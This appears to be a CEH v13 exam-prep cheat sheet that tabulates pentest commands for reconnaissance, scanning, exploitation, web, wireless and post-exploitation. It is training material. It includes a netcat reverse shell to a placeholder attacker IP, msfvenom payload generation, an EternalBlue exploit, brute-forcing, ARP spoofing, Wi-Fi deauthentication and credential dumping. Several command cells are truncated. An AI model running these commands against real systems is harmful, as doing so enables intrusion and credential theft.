ceh command cheat sheet

CEH Command Cheat Sheet (2025 Edition)

Master the Essential Commands for Your CEH v13 Exam and Real-World Ethical Hacking


🔍 Introduction

Whether you’re preparing for the Certified Ethical Hacker (CEH) v13 exam or sharpening your pentesting skills, having the right command at your fingertips can make all the difference.
This CEH Command Cheat Sheet (2025 Edition) gathers the most frequently used commands across the key CEH domains—so you can quickly reference, visualize, and practice them in labs or real-world assessments.

Back2Skills’ approach focuses on visual, beginner-friendly learning, so this guide is also infographic-ready—ideal for transforming into Canva slides or printable study sheets.


🧩 1. Information Gathering & Reconnaissance Commands

ToolPurposeCommand Example
whoisRetrieve domain registration infowhois example.com
nslookupQuery DNS records manuallynslookup -type=ANY example.com
digDetailed DNS lookupdig example.com ANY +noall +answer
theHarvesterCollect emails, hosts, and subdomainstheharvester -d example.com -b google
ShodanFind exposed devices and servicesshodan search apache port:80 country:US

🧠 Pro Tip (CEH Tip):
Know how to perform both passive and active reconnaissance—the exam often tests command syntax differences.


⚙️ 2. Scanning & Enumeration Commands

ToolPurposeCommand Example
nmapHost discovery and port scanningnmap -sS -p 1-1024 -T4 example.com
rustscanFast alternative to Nmaprustscan -a 192.168.1.0/24
enum4linuxEnumerate Windows shares and usersenum4linux -a 192.168.1.10
snmpwalkQuery SNMP devicessnmpwalk -v2c -c public 192.168.1.1
dnsreconDNS record enumerationdnsrecon -d example.com

💡 Analogy:
Think of enumeration like “peeling an onion”—each layer (DNS, SNMP, SMB) reveals more internal information.


💥 3. Vulnerability Analysis Commands

ToolPurposeCommand Example
niktoWeb server vulnerability scannikto -h http://example.com
wpscanWordPress security scannerwpscan --url http://example.com
nmapVulnerability scriptsnmap --script vuln 192.168.1.5
openvasNetwork vulnerability scanner`omp -u admin -w pass -T
nessuscliCLI vulnerability managementnessuscli update --plugins-only

🧠 CEH Tip:
Understand how to differentiate false positives from actual exploitable vulnerabilities—this concept often appears in CEH MCQs.


🧰 4. System Hacking & Privilege Escalation

ToolPurposeCommand Example
hydraBrute-force login credentialshydra -l admin -P passwords.txt ftp://192.168.1.10
johnPassword crackingjohn --wordlist=rockyou.txt hashes.txt
msfvenomGenerate payloadmsfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f exe > shell.exe
metasploitExploitation frameworkmsfconsole → use exploit/windows/smb/ms17_010_eternalblue
hashcatGPU-based password crackinghashcat -m 0 hashes.txt rockyou.txt

⚡ Analogy:
Privilege escalation is like finding the master key inside a building you already entered—it unlocks full control.


🌐 5. Web Application Hacking

ToolPurposeCommand Example
sqlmapSQL injection automationsqlmap -u "http://site.com/page.php?id=1" --dump
burpsuiteIntercept & modify HTTP trafficLaunch → Proxy → Intercept ON
dirbDiscover hidden directoriesdirb http://example.com/ /usr/share/wordlists/dirb/common.txt
wpscanWordPress exploit discoverywpscan --enumerate p
curlTest HTTP requests manuallycurl -I http://example.com

🧠 CEH Tip:
In CEH Practical, manual testing with BurpSuite and SQLMap is expected—memorize common SQLMap flags (--dbs--tables--columns--dump).


📡 6. Sniffing & Spoofing

ToolPurposeCommand Example
tcpdumpPacket capturetcpdump -i eth0 -w capture.pcap
wiresharkGUI network analysis(open capture.pcap)
ettercapARP spoofingettercap -T -M arp:remote /192.168.1.5/ /192.168.1.10/
arpspoofRedirect network trafficarpspoof -i eth0 -t 192.168.1.5 192.168.1.1
macchangerChange MAC addressmacchanger -r eth0

⚙️ Analogy:
Packet sniffing is like listening to conversations in a café—you’re not speaking, just observing.


📶 7. Wireless Hacking

ToolPurposeCommand Example
airmon-ngEnable monitor modeairmon-ng start wlan0
airodump-ngCapture Wi-Fi handshakesairodump-ng wlan0mon
aireplay-ngDeauthenticate clientsaireplay-ng --deauth 10 -a [BSSID] wlan0mon
aircrack-ngCrack WPA2 passwordsaircrack-ng -w wordlist.txt capture.cap

🧠 CEH Tip:
Expect CEH v13 labs around WPA2 cracking and Evil Twin AP attacks—practice using Kali + compatible adapter.


☁️ 8. Cloud & AI Tools (New for CEH v13)

ToolPurposeCommand Example
ShellGPTAI-assisted command generationshellgpt "generate nmap command for all open ports"
Tranis AICloud threat simulationWeb interface
Malware.AIAnalyze malicious binariesmalwareai scan sample.exe
AWS CLICloud service enumerationaws s3 ls
GCP CLIEnumerate cloud bucketsgcloud storage ls

💡 Pro Tip:
AI integration is one of CEH v13’s new dimensions—showing you can use AI for automation is a competitive edge.


🧱 9. Post-Exploitation & Reporting

ToolPurposeCommand Example
meterpreterPost-exploitation shellgetuidhashdumpscreenshot
netcatReverse shell creationnc -lvp 4444 / nc [attacker IP] 4444 -e /bin/bash
powersploitPowerShell exploitation scriptsImport-Module PowerSploit
EmpirePost-exploitation frameworkusemodule credentials/mimikatz
Linux privilege checkFind misconfigurationssudo -l / find / -perm -4000 2>/dev/null

🧠 CEH Tip:
Always include documentation commands—e.g., historyifconfignetstat—for professional reporting in CEH Practical.


📘 10. Documentation & Reporting Commands

ToolPurposeCommand Example
scriptRecord terminal sessionsscript session.log
teeSave command output`nmap -sV example.com
markdown / pandocConvert notes to reportspandoc notes.md -o report.pdf
grep / awkFilter large outputsgrep "open" scan.txt
echo / dateTimestamp logsecho $(date) >> actions.log

🧾 Analogy:
Documentation is the “ethical” in ethical hacking—it transforms chaos into clarity.


🧠 Key Takeaways

✅ Memorize syntax for Nmap, Hydra, SQLMap, and Metasploit—these appear in most CEH labs.
✅ Combine manual and automated commands for maximum efficiency.
✅ Use ShellGPT to generate and explain commands in context.
✅ Always record your findings—proper documentation is part of the CEH grading.
✅ Practice with platforms like TryHackMe and Hack The Box using these exact commands.

Scroll to Top